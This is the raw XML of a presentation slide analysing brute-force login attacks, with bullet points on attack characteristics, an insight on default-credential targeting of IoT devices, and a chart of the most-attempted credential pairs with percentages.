                  <a:pt x="0" y="15335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81050" y="32194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Characteristics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83431" y="3505200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91678" y="0"/>
                </a:moveTo>
                <a:cubicBezTo>
                  <a:pt x="91678" y="-4610"/>
                  <a:pt x="87954" y="-8334"/>
                  <a:pt x="83344" y="-8334"/>
                </a:cubicBezTo>
                <a:cubicBezTo>
                  <a:pt x="78734" y="-8334"/>
                  <a:pt x="75009" y="-4610"/>
                  <a:pt x="75009" y="0"/>
                </a:cubicBezTo>
                <a:lnTo>
                  <a:pt x="75009" y="16669"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="50006" y="16669"/>
                </a:lnTo>
                <a:cubicBezTo>
                  <a:pt x="36202" y="16669"/>
                  <a:pt x="25003" y="27868"/>
                  <a:pt x="25003" y="41672"/>
                </a:cubicBezTo>
                <a:lnTo>
                  <a:pt x="25003" y="100013"/>
                </a:lnTo>
                <a:cubicBezTo>
                  <a:pt x="25003" y="113816"/>
                  <a:pt x="36202" y="125016"/>
                  <a:pt x="50006" y="125016"/>
                </a:cubicBezTo>
                <a:lnTo>
                  <a:pt x="116681" y="125016"/>
                </a:lnTo>
                <a:cubicBezTo>
                  <a:pt x="130485" y="125016"/>
                  <a:pt x="141684" y="113816"/>
                  <a:pt x="141684" y="100013"/>
                </a:cubicBezTo>
                <a:lnTo>
                  <a:pt x="141684" y="41672"/>
                </a:lnTo>
                <a:cubicBezTo>
                  <a:pt x="141684" y="27868"/>
                  <a:pt x="130485" y="16669"/>
                  <a:pt x="116681" y="16669"/>
                </a:cubicBezTo>
                <a:lnTo>
                  <a:pt x="91678" y="16669"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="91678" y="0"/>
                </a:lnTo>
                <a:close/>
                <a:moveTo>
                  <a:pt x="41672" y="95845"/>
                </a:moveTo>
                <a:cubicBezTo>
                  <a:pt x="41672" y="92381"/>
                  <a:pt x="44459" y="89595"/>
                  <a:pt x="47923" y="89595"/>
                </a:cubicBezTo>
                <a:lnTo>
                  <a:pt x="56257" y="89595"/>
                </a:lnTo>
                <a:cubicBezTo>
                  <a:pt x="59721" y="89595"/>
                  <a:pt x="62508" y="92381"/>
                  <a:pt x="62508" y="95845"/>
                </a:cubicBezTo>
                <a:cubicBezTo>
                  <a:pt x="62508" y="99309"/>
                  <a:pt x="59721" y="102096"/>
                  <a:pt x="56257" y="102096"/>
                </a:cubicBezTo>
                <a:lnTo>
                  <a:pt x="47923" y="102096"/>
                </a:lnTo>
                <a:cubicBezTo>
                  <a:pt x="44459" y="102096"/>
                  <a:pt x="41672" y="99309"/>
                  <a:pt x="41672" y="95845"/>
                </a:cubicBezTo>
                <a:close/>
                <a:moveTo>
                  <a:pt x="72926" y="95845"/>
                </a:moveTo>
                <a:cubicBezTo>
                  <a:pt x="72926" y="92381"/>
                  <a:pt x="75713" y="89595"/>
                  <a:pt x="79177" y="89595"/>
                </a:cubicBezTo>
                <a:lnTo>
                  <a:pt x="87511" y="89595"/>
                </a:lnTo>
                <a:cubicBezTo>
                  <a:pt x="90975" y="89595"/>
                  <a:pt x="93762" y="92381"/>
                  <a:pt x="93762" y="95845"/>
                </a:cubicBezTo>
                <a:cubicBezTo>
                  <a:pt x="93762" y="99309"/>
                  <a:pt x="90975" y="102096"/>
                  <a:pt x="87511" y="102096"/>
                </a:cubicBezTo>
                <a:lnTo>
                  <a:pt x="79177" y="102096"/>
                </a:lnTo>
                <a:cubicBezTo>
                  <a:pt x="75713" y="102096"/>
                  <a:pt x="72926" y="99309"/>
                  <a:pt x="72926" y="95845"/>
                </a:cubicBezTo>
                <a:close/>
                <a:moveTo>
                  <a:pt x="104180" y="95845"/>
                </a:moveTo>
                <a:cubicBezTo>
                  <a:pt x="104180" y="92381"/>
                  <a:pt x="106966" y="89595"/>
                  <a:pt x="110430" y="89595"/>
                </a:cubicBezTo>
                <a:lnTo>
                  <a:pt x="118765" y="89595"/>
                </a:lnTo>
                <a:cubicBezTo>
                  <a:pt x="122229" y="89595"/>
                  <a:pt x="125016" y="92381"/>
                  <a:pt x="125016" y="95845"/>
                </a:cubicBezTo>
                <a:cubicBezTo>
                  <a:pt x="125016" y="99309"/>
                  <a:pt x="122229" y="102096"/>
                  <a:pt x="118765" y="102096"/>
                </a:cubicBezTo>
                <a:lnTo>
                  <a:pt x="110430" y="102096"/>
                </a:lnTo>
                <a:cubicBezTo>
                  <a:pt x="106966" y="102096"/>
                  <a:pt x="104180" y="99309"/>
                  <a:pt x="104180" y="95845"/>
                </a:cubicBezTo>
                <a:close/>
                <a:moveTo>
                  <a:pt x="58341" y="45839"/>
                </a:moveTo>
                <a:cubicBezTo>
                  <a:pt x="65240" y="45839"/>
                  <a:pt x="70842" y="51441"/>
                  <a:pt x="70842" y="58341"/>
                </a:cubicBezTo>
                <a:cubicBezTo>
                  <a:pt x="70842" y="65240"/>
                  <a:pt x="65240" y="70842"/>
                  <a:pt x="58341" y="70842"/>
                </a:cubicBezTo>
                <a:cubicBezTo>
                  <a:pt x="51441" y="70842"/>
                  <a:pt x="45839" y="65240"/>
                  <a:pt x="45839" y="58341"/>
                </a:cubicBezTo>
                <a:cubicBezTo>
                  <a:pt x="45839" y="51441"/>
                  <a:pt x="51441" y="45839"/>
                  <a:pt x="58341" y="45839"/>
                </a:cubicBezTo>
                <a:close/>
                <a:moveTo>
                  <a:pt x="95845" y="58341"/>
                </a:moveTo>
                <a:cubicBezTo>
                  <a:pt x="95845" y="51441"/>
                  <a:pt x="101447" y="45839"/>
                  <a:pt x="108347" y="45839"/>
                </a:cubicBezTo>
                <a:cubicBezTo>
                  <a:pt x="115247" y="45839"/>
                  <a:pt x="120848" y="51441"/>
                  <a:pt x="120848" y="58341"/>
                </a:cubicBezTo>
                <a:cubicBezTo>
                  <a:pt x="120848" y="65240"/>
                  <a:pt x="115247" y="70842"/>
                  <a:pt x="108347" y="70842"/>
                </a:cubicBezTo>
                <a:cubicBezTo>
                  <a:pt x="101447" y="70842"/>
                  <a:pt x="95845" y="65240"/>
                  <a:pt x="95845" y="58341"/>
                </a:cubicBezTo>
                <a:close/>
                <a:moveTo>
                  <a:pt x="16669" y="58341"/>
                </a:moveTo>
                <a:cubicBezTo>
                  <a:pt x="16669" y="53731"/>
                  <a:pt x="12944" y="50006"/>
                  <a:pt x="8334" y="50006"/>
                </a:cubicBezTo>
                <a:cubicBezTo>
                  <a:pt x="3724" y="50006"/>
                  <a:pt x="0" y="53731"/>
                  <a:pt x="0" y="58341"/>
                </a:cubicBezTo>
                <a:lnTo>
                  <a:pt x="0" y="83344"/>
                </a:lnTo>
                <a:cubicBezTo>
                  <a:pt x="0" y="87954"/>
                  <a:pt x="3724" y="91678"/>
                  <a:pt x="8334" y="91678"/>
                </a:cubicBezTo>
                <a:cubicBezTo>
                  <a:pt x="12944" y="91678"/>
                  <a:pt x="16669" y="87954"/>
                  <a:pt x="16669" y="83344"/>
                </a:cubicBezTo>
                <a:lnTo>
                  <a:pt x="16669" y="58341"/>
                </a:lnTo>
                <a:close/>
                <a:moveTo>
                  <a:pt x="158353" y="50006"/>
                </a:moveTo>
                <a:cubicBezTo>
                  <a:pt x="153743" y="50006"/>
                  <a:pt x="150019" y="53731"/>
                  <a:pt x="150019" y="58341"/>
                </a:cubicBezTo>
                <a:lnTo>
                  <a:pt x="150019" y="83344"/>
                </a:lnTo>
                <a:cubicBezTo>
                  <a:pt x="150019" y="87954"/>
                  <a:pt x="153743" y="91678"/>
                  <a:pt x="158353" y="91678"/>
                </a:cubicBezTo>
                <a:cubicBezTo>
                  <a:pt x="162963" y="91678"/>
                  <a:pt x="166688" y="87954"/>
                  <a:pt x="166688" y="83344"/>
                </a:cubicBezTo>
                <a:lnTo>
                  <a:pt x="166688" y="58341"/>
                </a:lnTo>
                <a:cubicBezTo>
                  <a:pt x="166688" y="53731"/>
                  <a:pt x="162963" y="50006"/>
                  <a:pt x="158353" y="50006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1" name="Text 9"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="1023938" y="3486150"/>
            <a:ext cx="3352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High-frequency automated attempts (10-50 per minute)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00100" y="3771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418" y="12502"/>
                </a:moveTo>
                <a:cubicBezTo>
                  <a:pt x="6954" y="12502"/>
                  <a:pt x="4167" y="15288"/>
                  <a:pt x="4167" y="18752"/>
                </a:cubicBezTo>
                <a:lnTo>
                  <a:pt x="4167" y="31254"/>
                </a:lnTo>
                <a:cubicBezTo>
                  <a:pt x="4167" y="34718"/>
                  <a:pt x="6954" y="37505"/>
                  <a:pt x="10418" y="37505"/>
                </a:cubicBezTo>
                <a:lnTo>
                  <a:pt x="22920" y="37505"/>
                </a:lnTo>
                <a:cubicBezTo>
                  <a:pt x="26384" y="37505"/>
                  <a:pt x="29170" y="34718"/>
                  <a:pt x="29170" y="31254"/>
                </a:cubicBezTo>
                <a:lnTo>
                  <a:pt x="29170" y="18752"/>
                </a:lnTo>
                <a:cubicBezTo>
                  <a:pt x="29170" y="15288"/>
                  <a:pt x="26384" y="12502"/>
                  <a:pt x="22920" y="12502"/>
                </a:cubicBezTo>
                <a:lnTo>
                  <a:pt x="10418" y="12502"/>
                </a:lnTo>
                <a:close/>
                <a:moveTo>
                  <a:pt x="50006" y="16669"/>
                </a:moveTo>
                <a:cubicBezTo>
                  <a:pt x="45396" y="16669"/>
                  <a:pt x="41672" y="20393"/>
                  <a:pt x="41672" y="25003"/>
                </a:cubicBezTo>
                <a:cubicBezTo>
                  <a:pt x="41672" y="29613"/>
                  <a:pt x="45396" y="33337"/>
                  <a:pt x="50006" y="33337"/>
                </a:cubicBezTo>
                <a:lnTo>
                  <a:pt x="125016" y="33337"/>
                </a:lnTo>
                <a:cubicBezTo>
                  <a:pt x="129626" y="33337"/>
                  <a:pt x="133350" y="29613"/>
                  <a:pt x="133350" y="25003"/>
                </a:cubicBezTo>
                <a:cubicBezTo>
                  <a:pt x="133350" y="20393"/>
                  <a:pt x="129626" y="16669"/>
                  <a:pt x="125016" y="16669"/>
                </a:cubicBezTo>
                <a:lnTo>
                  <a:pt x="50006" y="16669"/>
                </a:lnTo>
                <a:close/>
                <a:moveTo>
                  <a:pt x="50006" y="58341"/>
                </a:moveTo>
                <a:cubicBezTo>
                  <a:pt x="45396" y="58341"/>
                  <a:pt x="41672" y="62065"/>
                  <a:pt x="41672" y="66675"/>
                </a:cubicBezTo>
                <a:cubicBezTo>
                  <a:pt x="41672" y="71285"/>
                  <a:pt x="45396" y="75009"/>
                  <a:pt x="50006" y="75009"/>
                </a:cubicBezTo>
                <a:lnTo>
                  <a:pt x="125016" y="75009"/>
                </a:lnTo>
                <a:cubicBezTo>
                  <a:pt x="129626" y="75009"/>
                  <a:pt x="133350" y="71285"/>
                  <a:pt x="133350" y="66675"/>
                </a:cubicBezTo>
                <a:cubicBezTo>
                  <a:pt x="133350" y="62065"/>
                  <a:pt x="129626" y="58341"/>
                  <a:pt x="125016" y="58341"/>
                </a:cubicBezTo>
                <a:lnTo>
                  <a:pt x="50006" y="58341"/>
                </a:lnTo>
                <a:close/>
                <a:moveTo>
                  <a:pt x="50006" y="100013"/>
                </a:moveTo>
                <a:cubicBezTo>
                  <a:pt x="45396" y="100013"/>
                  <a:pt x="41672" y="103737"/>
                  <a:pt x="41672" y="108347"/>
                </a:cubicBezTo>
                <a:cubicBezTo>
                  <a:pt x="41672" y="112957"/>
                  <a:pt x="45396" y="116681"/>
                  <a:pt x="50006" y="116681"/>
                </a:cubicBez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ubicBezTo>
                  <a:pt x="133350" y="103737"/>
                  <a:pt x="129626" y="100013"/>
                  <a:pt x="125016" y="100013"/>
                </a:cubicBezTo>
                <a:lnTo>
                  <a:pt x="50006" y="100013"/>
                </a:lnTo>
                <a:close/>
                <a:moveTo>
                  <a:pt x="4167" y="60424"/>
                </a:moveTo>
                <a:lnTo>
                  <a:pt x="4167" y="72926"/>
                </a:lnTo>
                <a:cubicBezTo>
                  <a:pt x="4167" y="76390"/>
                  <a:pt x="6954" y="79177"/>
                  <a:pt x="10418" y="79177"/>
                </a:cubicBezTo>
                <a:lnTo>
                  <a:pt x="22920" y="79177"/>
                </a:lnTo>
                <a:cubicBezTo>
                  <a:pt x="26384" y="79177"/>
                  <a:pt x="29170" y="76390"/>
                  <a:pt x="29170" y="72926"/>
                </a:cubicBezTo>
                <a:lnTo>
                  <a:pt x="29170" y="60424"/>
                </a:lnTo>
                <a:cubicBezTo>
                  <a:pt x="29170" y="56960"/>
                  <a:pt x="26384" y="54173"/>
                  <a:pt x="22920" y="54173"/>
                </a:cubicBezTo>
                <a:lnTo>
                  <a:pt x="10418" y="54173"/>
                </a:lnTo>
                <a:cubicBezTo>
                  <a:pt x="6954" y="54173"/>
                  <a:pt x="4167" y="56960"/>
                  <a:pt x="4167" y="60424"/>
                </a:cubicBezTo>
                <a:close/>
                <a:moveTo>
                  <a:pt x="10418" y="95845"/>
                </a:moveTo>
                <a:cubicBezTo>
                  <a:pt x="6954" y="95845"/>
                  <a:pt x="4167" y="98632"/>
                  <a:pt x="4167" y="102096"/>
                </a:cubicBezTo>
                <a:lnTo>
                  <a:pt x="4167" y="114598"/>
                </a:lnTo>
                <a:cubicBezTo>
                  <a:pt x="4167" y="118062"/>
                  <a:pt x="6954" y="120848"/>
                  <a:pt x="10418" y="120848"/>
                </a:cubicBezTo>
                <a:lnTo>
                  <a:pt x="22920" y="120848"/>
                </a:lnTo>
                <a:cubicBezTo>
                  <a:pt x="26384" y="120848"/>
                  <a:pt x="29170" y="118062"/>
                  <a:pt x="29170" y="114598"/>
                </a:cubicBezTo>
                <a:lnTo>
                  <a:pt x="29170" y="102096"/>
                </a:lnTo>
                <a:cubicBezTo>
                  <a:pt x="29170" y="98632"/>
                  <a:pt x="26384" y="95845"/>
                  <a:pt x="22920" y="95845"/>
                </a:cubicBezTo>
                <a:lnTo>
                  <a:pt x="10418" y="95845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3" name="Text 11"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="1023938" y="3752850"/>
            <a:ext cx="2038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Sequential credential list traversal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00100" y="40386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ubicBezTo>
                  <a:pt x="0" y="29876"/>
                  <a:pt x="29876" y="0"/>
                  <a:pt x="66675" y="0"/>
                </a:cubicBezTo>
                <a:close/>
                <a:moveTo>
                  <a:pt x="60424" y="31254"/>
                </a:moveTo>
                <a:lnTo>
                  <a:pt x="60424" y="66675"/>
                </a:lnTo>
                <a:cubicBezTo>
                  <a:pt x="60424" y="68759"/>
                  <a:pt x="61466" y="70712"/>
                  <a:pt x="63211" y="71884"/>
                </a:cubicBezTo>
                <a:lnTo>
                  <a:pt x="88214" y="88553"/>
                </a:lnTo>
                <a:cubicBezTo>
                  <a:pt x="91079" y="90480"/>
                  <a:pt x="94960" y="89699"/>
                  <a:pt x="96887" y="86808"/>
                </a:cubicBezTo>
                <a:cubicBezTo>
                  <a:pt x="98814" y="83917"/>
                  <a:pt x="98033" y="80062"/>
                  <a:pt x="95142" y="78135"/>
                </a:cubicBezTo>
                <a:lnTo>
                  <a:pt x="72926" y="63341"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="72926" y="31254"/>
                </a:lnTo>
                <a:cubicBezTo>
                  <a:pt x="72926" y="27790"/>
                  <a:pt x="70139" y="25003"/>
                  <a:pt x="66675" y="25003"/>
                </a:cubicBezTo>
                <a:cubicBezTo>
                  <a:pt x="63211" y="25003"/>
                  <a:pt x="60424" y="27790"/>
                  <a:pt x="60424" y="31254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5" name="Text 13"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="1023938" y="401955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Rapid session termination on failure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00100" y="4305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652" y="72926"/>
                </a:moveTo>
                <a:lnTo>
                  <a:pt x="41932" y="72926"/>
                </a:lnTo>
                <a:cubicBezTo>
                  <a:pt x="42688" y="89725"/>
                  <a:pt x="46412" y="105195"/>
                  <a:pt x="51699" y="116525"/>
                </a:cubicBezTo>
                <a:cubicBezTo>
                  <a:pt x="54668" y="122906"/>
                  <a:pt x="57872" y="127412"/>
                  <a:pt x="60841" y="130173"/>
                </a:cubicBezTo>
                <a:cubicBezTo>
                  <a:pt x="63758" y="132907"/>
                  <a:pt x="65763" y="133350"/>
                  <a:pt x="66805" y="133350"/>
                </a:cubicBezTo>
                <a:cubicBezTo>
                  <a:pt x="67847" y="133350"/>
                  <a:pt x="69852" y="132907"/>
                  <a:pt x="72770" y="130173"/>
                </a:cubicBezTo>
                <a:cubicBezTo>
                  <a:pt x="75739" y="127412"/>
                  <a:pt x="78942" y="122880"/>
                  <a:pt x="81911" y="116525"/>
                </a:cubicBezTo>
                <a:cubicBezTo>
                  <a:pt x="87198" y="105195"/>
                  <a:pt x="90923" y="89725"/>
                  <a:pt x="91678" y="72926"/>
                </a:cubicBezTo>
                <a:close/>
                <a:moveTo>
                  <a:pt x="41906" y="60424"/>
                </a:moveTo>
                <a:lnTo>
                  <a:pt x="91626" y="60424"/>
                </a:lnTo>
                <a:cubicBezTo>
                  <a:pt x="90897" y="43625"/>
                  <a:pt x="87172" y="28155"/>
                  <a:pt x="81885" y="16825"/>
                </a:cubicBezTo>
                <a:cubicBezTo>
                  <a:pt x="78916" y="10470"/>
                  <a:pt x="75713" y="5938"/>
                  <a:pt x="72743" y="3177"/>
                </a:cubicBezTo>
                <a:cubicBezTo>
                  <a:pt x="69826" y="443"/>
                  <a:pt x="67821" y="0"/>
                  <a:pt x="66779" y="0"/>
                </a:cubicBezTo>
                <a:cubicBezTo>
                  <a:pt x="65737" y="0"/>
                  <a:pt x="63732" y="443"/>
                  <a:pt x="60815" y="3177"/>
                </a:cubicBezTo>
                <a:cubicBezTo>
                  <a:pt x="57846" y="5938"/>
                  <a:pt x="54642" y="10470"/>
                  <a:pt x="51673" y="16825"/>
                </a:cubicBezTo>
                <a:cubicBezTo>
                  <a:pt x="46386" y="28155"/>
                  <a:pt x="42662" y="43625"/>
                  <a:pt x="41906" y="60424"/>
                </a:cubicBezTo>
                <a:close/>
                <a:moveTo>
                  <a:pt x="29405" y="60424"/>
                </a:moveTo>
                <a:cubicBezTo>
                  <a:pt x="30316" y="38130"/>
                  <a:pt x="36072" y="17424"/>
                  <a:pt x="44485" y="3829"/>
                </a:cubicBezTo>
                <a:cubicBezTo>
                  <a:pt x="20497" y="12319"/>
                  <a:pt x="2839" y="34171"/>
                  <a:pt x="391" y="60424"/>
                </a:cubicBezTo>
                <a:lnTo>
                  <a:pt x="29405" y="60424"/>
                </a:lnTo>
                <a:close/>
                <a:moveTo>
                  <a:pt x="391" y="72926"/>
                </a:moveTo>
                <a:cubicBezTo>
                  <a:pt x="2839" y="99179"/>
                  <a:pt x="20497" y="121031"/>
                  <a:pt x="44485" y="129521"/>
                </a:cubicBezTo>
                <a:cubicBezTo>
                  <a:pt x="36072" y="115926"/>
                  <a:pt x="30316" y="95220"/>
                  <a:pt x="29405" y="72926"/>
                </a:cubicBezTo>
                <a:lnTo>
                  <a:pt x="391" y="72926"/>
                </a:lnTo>
                <a:close/>
                <a:moveTo>
                  <a:pt x="104154" y="72926"/>
                </a:moveTo>
                <a:cubicBezTo>
                  <a:pt x="103242" y="95220"/>
                  <a:pt x="97486" y="115926"/>
                  <a:pt x="89074" y="129521"/>
                </a:cubicBezTo>
                <a:cubicBezTo>
                  <a:pt x="113061" y="121005"/>
                  <a:pt x="130719" y="99179"/>
                  <a:pt x="133168" y="72926"/>
                </a:cubicBezTo>
                <a:lnTo>
                  <a:pt x="104154" y="72926"/>
                </a:lnTo>
                <a:close/>
                <a:moveTo>
                  <a:pt x="133168" y="60424"/>
                </a:moveTo>
                <a:cubicBezTo>
                  <a:pt x="130719" y="34171"/>
                  <a:pt x="113061" y="12319"/>
                  <a:pt x="89074" y="3829"/>
                </a:cubicBezTo>
                <a:cubicBezTo>
                  <a:pt x="97486" y="17424"/>
                  <a:pt x="103242" y="38130"/>
                  <a:pt x="104154" y="60424"/>
                </a:cubicBezTo>
                <a:lnTo>
                  <a:pt x="133168" y="60424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17" name="Text 15"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="1023938" y="4286250"/>
            <a:ext cx="2705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Distributed source IPs (botnet infrastructure)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3888" y="4795838"/>
            <a:ext cx="5114925" cy="962025"/>
          </a:xfrm>
          <a:custGeom>
            <a:avLst/>
            <a:gdLst/>
            <a:ahLst/>
            <a:cxnLst/>
            <a:rect l="l" t="t" r="r" b="b"/>
            <a:pathLst>
              <a:path w="5114925" h="962025">
                <a:moveTo>
                  <a:pt x="38096" y="0"/>
                </a:moveTo>
                <a:lnTo>
                  <a:pt x="5076829" y="0"/>
                </a:lnTo>
                <a:cubicBezTo>
                  <a:pt x="5097869" y="0"/>
                  <a:pt x="5114925" y="17056"/>
                  <a:pt x="5114925" y="38096"/>
                </a:cubicBezTo>
                <a:lnTo>
                  <a:pt x="5114925" y="923929"/>
                </a:lnTo>
                <a:cubicBezTo>
                  <a:pt x="5114925" y="944969"/>
                  <a:pt x="5097869" y="962025"/>
                  <a:pt x="5076829" y="962025"/>
                </a:cubicBezTo>
                <a:lnTo>
                  <a:pt x="38096" y="962025"/>
                </a:lnTo>
                <a:cubicBezTo>
                  <a:pt x="17056" y="962025"/>
                  <a:pt x="0" y="944969"/>
                  <a:pt x="0" y="923929"/>
                </a:cubicBezTo>
                <a:lnTo>
                  <a:pt x="0" y="38096"/>
                </a:lnTo>
                <a:cubicBezTo>
                  <a:pt x="0" y="17070"/>
                  <a:pt x="17070" y="0"/>
                  <a:pt x="38096" y="0"/>
                </a:cubicBezTo>
                <a:close/>
              </a:path>
            </a:pathLst>
          </a:custGeom>
          <a:solidFill>
            <a:srgbClr val="6366F1">
              <a:alpha val="10196"/>
            </a:srgbClr>
          </a:solidFill>
          <a:ln w="1270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81050" y="49911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0" name="Text 18"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="1013966" y="4953000"/>
            <a:ext cx="4638675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Insight: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The prevalence of default credential attacks demonstrates that attackers prioritize low-hanging fruit, targeting the vast population of poorly configured IoT devices and servers.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5063" y="1509713"/>
            <a:ext cx="5591175" cy="5324475"/>
          </a:xfrm>
          <a:custGeom>
            <a:avLst/>
            <a:gdLst/>
            <a:ahLst/>
            <a:cxnLst/>
            <a:rect l="l" t="t" r="r" b="b"/>
            <a:pathLst>
              <a:path w="5591175" h="5324475">
                <a:moveTo>
                  <a:pt x="76193" y="0"/>
                </a:moveTo>
                <a:lnTo>
                  <a:pt x="5514982" y="0"/>
                </a:lnTo>
                <a:cubicBezTo>
                  <a:pt x="5557062" y="0"/>
                  <a:pt x="5591175" y="34113"/>
                  <a:pt x="5591175" y="76193"/>
                </a:cubicBezTo>
                <a:lnTo>
                  <a:pt x="5591175" y="5248282"/>
                </a:lnTo>
                <a:cubicBezTo>
                  <a:pt x="5591175" y="5290362"/>
                  <a:pt x="5557062" y="5324475"/>
                  <a:pt x="5514982" y="5324475"/>
                </a:cubicBezTo>
                <a:lnTo>
                  <a:pt x="76193" y="5324475"/>
                </a:lnTo>
                <a:cubicBezTo>
                  <a:pt x="34113" y="5324475"/>
                  <a:pt x="0" y="5290362"/>
                  <a:pt x="0" y="5248282"/>
                </a:cubicBezTo>
                <a:lnTo>
                  <a:pt x="0" y="76193"/>
                </a:lnTo>
                <a:cubicBezTo>
                  <a:pt x="0" y="34141"/>
                  <a:pt x="34141" y="0"/>
                  <a:pt x="7619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8425" y="1743075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 5 Credential Pairs Attempted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53188" y="2166938"/>
            <a:ext cx="5114925" cy="771525"/>
          </a:xfrm>
          <a:custGeom>
            <a:avLst/>
            <a:gdLst/>
            <a:ahLst/>
            <a:cxnLst/>
            <a:rect l="l" t="t" r="r" b="b"/>
            <a:pathLst>
              <a:path w="5114925" h="771525">
                <a:moveTo>
                  <a:pt x="38098" y="0"/>
                </a:moveTo>
                <a:lnTo>
                  <a:pt x="5076827" y="0"/>
                </a:lnTo>
                <a:cubicBezTo>
                  <a:pt x="5097868" y="0"/>
                  <a:pt x="5114925" y="17057"/>
                  <a:pt x="5114925" y="38098"/>
                </a:cubicBezTo>
                <a:lnTo>
                  <a:pt x="5114925" y="733427"/>
                </a:lnTo>
                <a:cubicBezTo>
                  <a:pt x="5114925" y="754468"/>
                  <a:pt x="5097868" y="771525"/>
                  <a:pt x="5076827" y="771525"/>
                </a:cubicBezTo>
                <a:lnTo>
                  <a:pt x="38098" y="771525"/>
                </a:lnTo>
                <a:cubicBezTo>
                  <a:pt x="17057" y="771525"/>
                  <a:pt x="0" y="754468"/>
                  <a:pt x="0" y="733427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610350" y="23241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572250" y="23241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029450" y="236220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/ 123456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986790" y="2362200"/>
            <a:ext cx="504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23.4%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610350" y="2705100"/>
            <a:ext cx="4800600" cy="76200"/>
          </a:xfrm>
          <a:custGeom>
            <a:avLst/>
            <a:gdLst/>
            <a:ahLst/>
            <a:cxnLst/>
            <a:rect l="l" t="t" r="r" b="b"/>
            <a:pathLst>
              <a:path w="4800600" h="76200">
                <a:moveTo>
                  <a:pt x="38100" y="0"/>
                </a:moveTo>
                <a:lnTo>
                  <a:pt x="4762500" y="0"/>
                </a:lnTo>
                <a:cubicBezTo>
                  <a:pt x="4783528" y="0"/>
                  <a:pt x="4800600" y="17072"/>
                  <a:pt x="4800600" y="38100"/>
                </a:cubicBezTo>
                <a:lnTo>
                  <a:pt x="4800600" y="38100"/>
                </a:lnTo>
                <a:cubicBezTo>
                  <a:pt x="4800600" y="59128"/>
                  <a:pt x="4783528" y="76200"/>
                  <a:pt x="4762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29" name="Shape 27"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="6610350" y="2705100"/>
            <a:ext cx="1123950" cy="76200"/>
          </a:xfrm>
          <a:custGeom>
            <a:avLst/>
            <a:gdLst/>
            <a:ahLst/>
            <a:cxnLst/>
            <a:rect l="l" t="t" r="r" b="b"/>
            <a:pathLst>
              <a:path w="1123950" h="76200">
                <a:moveTo>
                  <a:pt x="38100" y="0"/>
                </a:moveTo>
                <a:lnTo>
                  <a:pt x="1085850" y="0"/>
                </a:lnTo>
                <a:cubicBezTo>
                  <a:pt x="1106878" y="0"/>
                  <a:pt x="1123950" y="17072"/>
                  <a:pt x="1123950" y="38100"/>
                </a:cubicBezTo>
                <a:lnTo>
                  <a:pt x="1123950" y="38100"/>
                </a:lnTo>
                <a:cubicBezTo>
                  <a:pt x="1123950" y="59128"/>
                  <a:pt x="1106878" y="76200"/>
                  <a:pt x="10858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30" name="Shape 28"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="6453188" y="3062288"/>
            <a:ext cx="5114925" cy="771525"/>
          </a:xfrm>
          <a:custGeom>
            <a:avLst/>
            <a:gdLst/>
            <a:ahLst/>
            <a:cxnLst/>
            <a:rect l="l" t="t" r="r" b="b"/>
            <a:pathLst>
              <a:path w="5114925" h="771525">
                <a:moveTo>
                  <a:pt x="38098" y="0"/>
                </a:moveTo>
                <a:lnTo>
                  <a:pt x="5076827" y="0"/>
                </a:lnTo>
                <a:cubicBezTo>
                  <a:pt x="5097868" y="0"/>
                  <a:pt x="5114925" y="17057"/>
                  <a:pt x="5114925" y="38098"/>
                </a:cubicBezTo>
                <a:lnTo>
                  <a:pt x="5114925" y="733427"/>
                </a:lnTo>
                <a:cubicBezTo>
                  <a:pt x="5114925" y="754468"/>
                  <a:pt x="5097868" y="771525"/>
                  <a:pt x="5076827" y="771525"/>
                </a:cubicBezTo>
                <a:lnTo>
                  <a:pt x="38098" y="771525"/>
                </a:lnTo>
                <a:cubicBezTo>
                  <a:pt x="17057" y="771525"/>
                  <a:pt x="0" y="754468"/>
                  <a:pt x="0" y="733427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610350" y="32194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572250" y="321945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29450" y="325755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 / admin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022360" y="3257550"/>
            <a:ext cx="466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18.7%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610350" y="3600450"/>
            <a:ext cx="4800600" cy="76200"/>
          </a:xfrm>
          <a:custGeom>
            <a:avLst/>
            <a:gdLst/>
            <a:ahLst/>
            <a:cxnLst/>
            <a:rect l="l" t="t" r="r" b="b"/>
            <a:pathLst>
              <a:path w="4800600" h="76200">
                <a:moveTo>
                  <a:pt x="38100" y="0"/>
                </a:moveTo>
                <a:lnTo>
                  <a:pt x="4762500" y="0"/>
                </a:lnTo>
                <a:cubicBezTo>
                  <a:pt x="4783528" y="0"/>
                  <a:pt x="4800600" y="17072"/>
                  <a:pt x="4800600" y="38100"/>
                </a:cubicBezTo>
                <a:lnTo>
                  <a:pt x="4800600" y="38100"/>
                </a:lnTo>
                <a:cubicBezTo>
                  <a:pt x="4800600" y="59128"/>
                  <a:pt x="4783528" y="76200"/>
                  <a:pt x="4762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36" name="Shape 34"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="6610350" y="3600450"/>
            <a:ext cx="895350" cy="76200"/>
          </a:xfrm>
          <a:custGeom>
            <a:avLst/>
            <a:gdLst/>
            <a:ahLst/>
            <a:cxnLst/>
            <a:rect l="l" t="t" r="r" b="b"/>
            <a:pathLst>
              <a:path w="895350" h="76200">
                <a:moveTo>
                  <a:pt x="38100" y="0"/>
                </a:moveTo>
                <a:lnTo>
                  <a:pt x="857250" y="0"/>
                </a:lnTo>
                <a:cubicBezTo>
                  <a:pt x="878278" y="0"/>
                  <a:pt x="895350" y="17072"/>
                  <a:pt x="895350" y="38100"/>
                </a:cubicBezTo>
                <a:lnTo>
